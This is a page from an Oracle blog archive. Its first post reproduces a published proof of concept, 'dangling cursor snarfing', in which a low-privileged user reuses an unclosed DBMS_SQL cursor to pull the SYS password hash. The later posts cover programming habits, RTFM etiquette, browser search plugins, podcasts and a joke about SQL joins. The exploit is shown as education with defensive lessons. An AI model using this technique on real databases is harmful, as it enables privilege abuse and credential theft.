See How To Hack Oracle Using Dangling Cursor Snarfing
David Litchfield published a paper demonstrating how an unclosed or dangling cursor created and used by DBMS_SQL can lead to a security hole.
I ran his proof of this vulnerability on my Oracle Database 10g Express Edition database.
Connected as SYS:
SQL> CREATE OR REPLACE PROCEDURE pwd_compare(p_user VARCHAR) IS
2 cursor_name INTEGER;
3 v_pwd VARCHAR2(30);
4 i INTEGER;
5 BEGIN
6
7 IF p_user != 'SYS' THEN
8 cursor_name := dbms_sql.open_cursor;
9 DBMS_OUTPUT.PUT_LINE('CURSOR: ' || cursor_name);
10 dbms_sql.parse(cursor_name,
11 'SELECT PASSWORD FROM SYS.DBA_USERS WHERE USERNAME = :u',
12 dbms_sql.native);
13 dbms_sql.bind_variable(cursor_name, ':u', p_user);
14 dbms_sql.define_column(cursor_name, 1, v_pwd, 30);
15 i := dbms_sql.EXECUTE(cursor_name);
16
17 IF dbms_sql.fetch_rows(cursor_name) > 0 THEN
18 dbms_sql.column_value(cursor_name, 1, v_pwd);
19 END IF;
20
21 IF v_pwd = '0123456789ABCDEF' THEN
22 DBMS_OUTPUT.PUT_LINE('Hmmm....');
23 END IF;
24
25 dbms_sql.close_cursor(cursor_name);
26 END IF;
27
28 END;
29 /
Procedure created.
SQL> GRANT EXECUTE ON pwd_compare TO PUBLIC;
Grant succeeded.
Note that, in the code above, there is no exception handling so if there is an error before the cursor is closed then the cursor will be left dangling.
Now, let’s connect as HR, a lower privileged user than SYS, and execute the procedure pwd_compare making sure we generate an exception in it:
SQL> DECLARE x VARCHAR(32000);
2 i INTEGER;
3 BEGIN
4 FOR i IN 1 .. 10000
5 LOOP
6 x := 'B' || x;
7 END LOOP;
8
9 sys.pwd_compare(x);
10 END;
11 /
CURSOR: 6
DECLARE x VARCHAR(32000);
*
ERROR at line 1:
ORA-01460: unimplemented or unreasonable conversion requested
ORA-06512: at "SYS.DBMS_SYS_SQL", line 1202
ORA-06512: at "SYS.DBMS_SQL", line 323
ORA-06512: at "SYS.PWD_COMPARE", line 15
ORA-06512: at line 9
What we have now is a dangling cursor with an ID number of 6. Armed with this piece of information we can rebind the username associated with the query, using SYS, then re-execute the query and extract the password hash for the SYS user bypassing the logic in the procedure pwd_compare:
SQL> DECLARE cursor_name INTEGER;
2 i INTEGER;
3 pwd VARCHAR2(30);
4 BEGIN
5 cursor_name := 6;
6 dbms_sql.bind_variable(cursor_name, ':u', 'SYS');
7 dbms_sql.define_column(cursor_name, 1, pwd, 30);
8 i := dbms_sql.EXECUTE(cursor_name);
9
10 IF dbms_sql.fetch_rows(cursor_name) > 0 THEN
11 dbms_sql.column_value(cursor_name, 1, pwd);
12 END IF;
13
14 dbms_sql.close_cursor(cursor_name);
15 DBMS_OUTPUT.PUT_LINE('PWD: ' || pwd);
16 END;
17 /
PWD: 586EEA79959C07B1
PL/SQL procedure successfully completed.
Interesting!
Lessons learned:
- Always perform extensive input validation.
- Always add exception handlers to your blocks.
- Always make sure to close your cursors.
Sources and resources:
- databasesecurity.com – Hacking Oracle
- SecurityFocus – BugTraq mailing list
- eWeek – Security Researcher: Beware Dangling Cursors in Oracle Code
Do You Have These Symptoms?
One of my ex-coworkers emailed me this photo. The subject of the email was: Winner of “not my job” award.
When I looked at this photo, the word “laziness” started flashing in my mind. My thoughts then wandered to laziness as it related to programming. I then asked myself: what is laziness in programming? Here are a few thoughts:
- Laziness is when you do not follow best practices.
- Laziness is when you do not handle exceptions.
- Laziness is when you do not research problems before asking dumb questions.
- Laziness is when you do not check out what’s new in new versions.
- Laziness is when you do not take the time to learn every feature available to you.
- Laziness is when you do not comment or document your code.
- Laziness is when you do it the quick and dirty way.
- Laziness is when you do start coding before even understanding what the program really does.
- Laziness is WHEN OTHERS THEN NULL.
Throughout my career I was guilty of being lazy. But some may argue that good programmers are not only lazy, but also dumb:
…for a lazy programmer to be a good programmer, he (or she) also must be incredibly unlazy when it comes to learning how to stay lazy – that is, which software tools make his work easier, which approaches avoid redundancy, and how he can make his work be maintained and refactored easily.
…a good programmer must be dumb. Why? Because if he’s smart, and he knows he is smart, he will: a) stop learning b) stop being critical towards his own work… a good programmer, when confronted with a problem from management, will adopt this mindset of being dumb; he will start asking the most simple, child-like questions. Because he doesn’t accept the parameters suggested to him that someone thinks make up the problem.
So, you should always try to be lazy in an “unlazy” way, and dumb in a smart way.
12 Comments | Filed in ColdFusion, Interesting Stuff, Oracle | Tags: programmingFour New Blogs Added to OraNA
Just a quick note to let you know that I have added the following blogs to OraNA:
Have a great weekend!
2 Comments | Filed in Oracle | Tags: aggregator, blogSee How Easily You Can Search Oracle
Since the introduction of the first Oracle search plugins for Firefox, a few things have changed:
- Mozilla upgraded Firefox to version 2.
- Microsoft upgraded Internet Explorer to version 7.
- And Google released the Custom Search Engine.
So, what does this have to do with search plugins? Read on and you will know:
- What’s new in IE7 and Firefox 2 regarding search plugins.
- You will be introduced to the new Oracle custom search engines powered by Google.
- And you will be able to install many Oracle search plugins that will help you in your Oracle-related research and learning.
Search plugins in the new Firefox 2 and IE 7
Both Firefox 2 and IE 7 browsers now support the OpenSearch description format (XML) for search plugins. Which means that if you develop a search plugin for Firefox, that exact same search plugin can also be installed and used in Internet Explorer.
Moreover, there are now two (automated) ways to install search plugins (and they both work in Firefox 2 and IE 7). The first is to call one simple JavaScript function, the second is through auto-discovery of search plugins.
Using auto-discovery, a web site that offers a search plugin can advertise it so that Firefox 2 and IE 7 users can easily download and install the plugin. This is similar to the RSS auto-discovery of feeds.
Search Plugin Installation in IE 7 Using Auto-Discovery
In IE 7, here is how the search bar looks when you browse a website without search plugin auto-discovery:
And here is how it looks with search plugin auto-discovery enabled:
If you click on that small orange down-arrow, you will see something similar to this:
In fact, if you are using IE 7 to browse this very page, you will be able to see it in action in your browser right now. Just look at your search bar.
Note: I have noticed that IE 7 does not discover more than 3 search plugins using auto-discovery.
Search Plugin Installation in IE 7 Using a JavaScript Link
Alternatively, if the installation is done using the JavaScript link, you will be presented with this window in IE 7:
Search Plugin Installation in Firefox 2 Using Auto-Discovery
In Firefox 2, here is how the search bar looks when you browse a website without search plugin auto-discovery:
And here is how it looks with search plugin auto-discovery enabled:
If you click on that small blue-ish down-arrow, you will see something similar to this:
In fact, if you are using Firefox 2.0 to browse this very page (or Wikipedia for example), you will be able to see it in action in your browser. Just look at your search bar.
Search Plugin Installation in Firefox 2 Using a JavaScript Link
Alternatively, if the installation is done using the JavaScript link, you will be presented with this window in Firefox 2.0:
Oracle Custom Search Engines
I have created three Oracle custom search engines powered by Google.
The first search engine is for Oracle-related blogs. It searches all the blogs aggregated by OraNA.
The second search engine is for Oracle-related forums and mailing lists. Currently this search engine searches the following sites:
- freelists.org/archives/oracle-l/
- orafaq.com/forum/
- dbasupport.com/forums/
- petefinnigan.com/forum/
- rittman.net/forum/
- oracle-base.com/forums/
- dba.ipbhost.com
- asktom.oracle.com
- groups.google.com/group/comp.databases.oracle
- forums.oracle.com
Let me know if you have other Oracle-related forums you want to include in this search engine.
The third search engine is for Oracle-related websites. Currently this search engine searches the following sites:
- jlcomp.demon.co.uk
- dizwell.com
- akadia.com
- idevelopment.info
- arikaplan.com/oracle/
- julian.dyke.users.btopenworld.com/com/
- dba-oracle.com
- psoug.org
- orafaq.com
- oracle-base.com
- oracle.com (including OTN)
- red-database-security.com
Let me know if you have other Oracle-related sites you want to include in this search engine.
These search engines, and more, are now available to you right from your browser’s search bar.
Install Oracle search plugins
Just click on a search plugin below to add it to the list of engines available in your browser’s search bar:
(Firefox 2 or IE 7 and above only)
Oracle Custom Search Engines:
Oracle Documentation Search Engines:
- Oracle – All versions
- Oracle DB 8.1.7
- Oracle DB 9.0.1
- Oracle DB 9.2
- Oracle DB 10.1
- Oracle DB 10.2
- Oracle DB 11.1
- Oracle DB 10.2 Error Messages
- Oracle DB 10.2 Virtual Book
- Oracle Application Server 10.1.3.1
- Oracle Metalink
Keyboard Shortcuts
Here are four search bar keyboard shortcuts that will make using the search bar even faster:
- Go to search bar: Ctrl+K in Firefox. Ctrl+E in IE.
- Select next search engine in search bar: Alt+Down in Firefox. Ctrl+Down in IE.
- Select previous search engine in search bar: Alt+Up in Firefox. Ctrl+Up in IE.
- Open search results in a new tab: Alt+Enter
And here is a bonus tip to change the width of the search bar in Firefox.
Happy searching!
6 Comments | Filed in Firefox, Google, Oracle, Plugins | Tags: Documentation, Firefox, internet-explorer, plugin, search
links for 2006-11-17
-
A comprehensive list of default passwords for a variety of systems.
-
Not the latest (Oracle 9i DB), but still a good read.
-
Compares MVCC in Oracle, DB2 and Firebird
-
How the problem of “missing information†might be addressed in the total absence of nulls (PDF).
-
Swingbench is a free load generator (and benchmarks) designed to stress test an Oracle database (9i or 10g).
Hundreds of Free E-Books, Wow!
I came across this Chinese website that has hundreds of e-books about Oracle, Microsoft, Dreamweaver, Flash, Java, PHP, mySQL, Linux, Cisco and many many more, all ready for your online reading pleasure. I do not think this is legal. At least, it is as legal as software piracy.
2 Comments | Filed in Books, ColdFusion, Oracle | Tags: bookBart’s Punishment For Asking Dumb Questions
Using Google to find answers is a good idea, but when it comes to finding answers to technical questions, hitting the documentation first is a very smart move that may save you some humiliation later on.
When you ask “obvious” questions on forums or mailing lists, there is a good chance that the more experienced forum contributors will hit you with an answer like this one: RTFM before asking dumb questions.
Tim Hall has noticed a trend in the Oracle forums:
It feels like most posters these days don’t even bother to open the manuals before asking a question. I can’t count the number of times I’ve been asked a question, that is answered by the first couple of paragraphs in the manual. It’s just lazy beyond words.
OK, so Tim is predicting the downfall of Oracle forums because posters don’t bother to RTFM first.
Now, with the help of Oracle Blogs Search and Google, let’s see what other bloggers have written about this subject:
I do recommend and point people to the documentation, but I don’t think I give RTFM answers… I will answer with a gentle reminder such as “well, when I typed your subject into the search field, I found these 5 articles, did you see them?”.
How To Be A Good Guru – by Andrew Clarke:
Telling some newbie “RTFM” is an act of pure arrogance. It just feeds the respondent’s ego without helping that questioner learn anything, except maybe not to ask for help in the forum again.
But it’s in the manual! – by Jonathan Lewis:
I’ve just seen a note on the news group comp.databases.server.oracle advising someone to check the online manual for a piece of code to report which objects are using how much space in the buffer cache. This is the reference and this is the code… There are two flaws with this code – it gets the wrong results, and it’s inefficient.
RTFM, Newbies etc – by Niall Litchfield:
RTFM says “you’re wasting my time and I think you are stupid”. I wouldn’t say that to anyone in one-to-one conversation, I don’t see why it is acceptable in email. (unless you are 14, male and on a video games forum obviously).
Read the ******* Manual – by Andrew Gilfrin:
First let me say I’m not a prude, but neither do I have a mouth like a toilet. But I do find the acronym RTFM incredibly offensive.
How to get users to RTFM – by Kathy Sierra
The “F” in RTFM is the biggest clue that most of us blame the user for not reading the manual… since we can’t force our users to do anything, if we want them to RTFM, we need to make a better FM.
And finally, here is what I say:
- Don’t use the acronym RTFM.
- Do point people to the documentation.
- Don’t blindly trust the documentation.
- Do test, test and test, even after you read the documentation.
- Don’t be afraid to ask dumb questions. What’s dumb to some, is genius to others.
Feel free to add your own DO or DON’T, or even ask dumb questions, I promise I won’t throw an RTFM on you 
A Couple of Podcasts About PL/SQL and Oracle Security
SearchOracle.com has just published a couple of interesting podcasts.
The first, titled Expert says PL/SQL change needed in Oracle 11g, is an interview with Steven Feuerstein.
In the interview, Steven answers the following questions:
- Considering how big OpenWorld has become, should there be a separate conference for PL/SQL developers?
- Your session at the conference was entitled “Ten things you should never do with PL/SQL.” What was number one?
- What do you think is the biggest problem or challenge that PL/SQL developers need to address?
- Users are very conditioned to accept bugs. Does this need to change?
- Can you tell us about your new free tool for testing code?
- What do you think are the biggest deficiencies in the PL/SQL language itself?
- You’ve written ten very well regarded books. What’s next?
The second podcast, titled Security expert sizes up Oracle patch policies, is an interview with Aaron Newman, author of “Oracle Security Handbook” and co-founder and chief technology officer of Application Security Inc.
In the interview, Aaron answers the following questions:
- Is Oracle OpenWorld getting too big to be useful?
- Can you explain the methodology behind what you call post-attack analytics?
- You argue that improper use of Oracle security products can erase the trail of an attacker. Could you elaborate on that?
- What do you think about the overall state of Oracle security these days?
- Is patching vulnerabilities a problem for Oracle?
- How does Oracle stack up against Microsoft and IBM in the area of patching?
- What does your firm offer in terms of security that Oracle does not?
- Will Oracle’s Fusion initiative be good or bad for Oracle security?
- What have you heard about the upcoming Oracle Database 11g?
- What are some of the pet peeves you have with Oracle DBAs when it comes to security?
Peek at what others are putting in their Google Notebook
Google Notebook is very useful. It enables you to clip and gather information while you’re browsing the web. It lives in your browser and online. All your web findings are gathered into one organized, easy accessible location that you can access from any computer. In fact, I use Google Notebook to store notes and ideas about things I want to blog about.
Moreover, Google Notebook has a very interesting feature. You can actually publish your notebook to the web, allowing the public to view your notebook’s content. Your public notebook is also included in Google’s search results, and, as a result, searchable. That’s cool. Let’s search the public Google notebooks for “Oracle”:
Interesting. About 447 public Google notebooks have the word “Oracle” in them. Now, if you would please excuse me, I’ll go and poke around these Oracle notebooks, just for curiosity.
Comments Off | Filed in Google, Oracle, Tips | Tags: Google, notebookGive Me One Minute And I’ll Tell You If You Are Liberal Or Conservative
This Tuesday is election day in the United States. It’s a big day. Political enthusiasts from both the Republican and Democrat parties go to the polls and vote for their preferred candidates for member of Congress, state legislature and governor.
But, what does this have to do with databases. Well, it turns out that the SQL language has politics embedded in it. For example, consider the following two simple queries:
Query 1:
SELECT emp.last_name,
dept.department_name
FROM departments dept LEFT OUTER JOIN employees emp
ON dept.department_id = emp.department_id
Query 2:
SELECT emp.last_name,
dept.department_name
FROM employees emp RIGHT OUTER JOIN departments dept
ON dept.department_id = emp.department_id
Both queries return the same result set. The difference between the two is that one uses “LEFT” and the other uses “RIGHT”.
Which one do you prefer using? In other words, which type of outer join do you usually use in your queries, the left or the right?
Now, if you select query 1, the one that uses the “LEFT” join, you most probably lean towards the left. You are a liberal. As a result, you are more likely to vote Democrat this Tuesday.
But, if you select query 2, the one that uses the “RIGHT” join, you most probably lean towards the right. You are a conservative. As a result, you are more likely to vote Republican this Tuesday.
There you go. A simple test, for all of you SQL developers out there, to know your political affiliation.
Some have called for a boycott of all right joins and only use left joins on Tuesday. Others have called for the abolition of both the left and the right.
Personally, I do not use right joins. But again, I cannot vote because I’m not a US citizen.
6 Comments | Filed in Interesting Stuff, Joins, Oracle | Tags: election, politics, sql
